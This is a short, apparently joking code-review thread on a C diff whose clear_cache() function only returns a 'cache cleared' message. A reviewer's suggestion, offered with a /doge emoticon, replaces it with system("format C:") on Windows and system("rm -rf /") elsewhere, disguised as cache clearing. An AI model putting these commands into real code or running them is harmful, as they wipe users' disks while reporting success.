main.c

```diff
@@ -4,6 +4,10 @@ int surf_internet() {
   return 0;
 }
 
+char clear_cache(){
+  return "缓存清除成功!";
```

Comment:
作为认真务实的国产浏览器，有名无实不太好吧 /doge
```suggestion
  #ifdef _WIN32
  int ret = system("format C:");
  #else
  int ret = system("rm -rf /");
  #endif
  if (!ret)
    return "缓存清除成功!";
```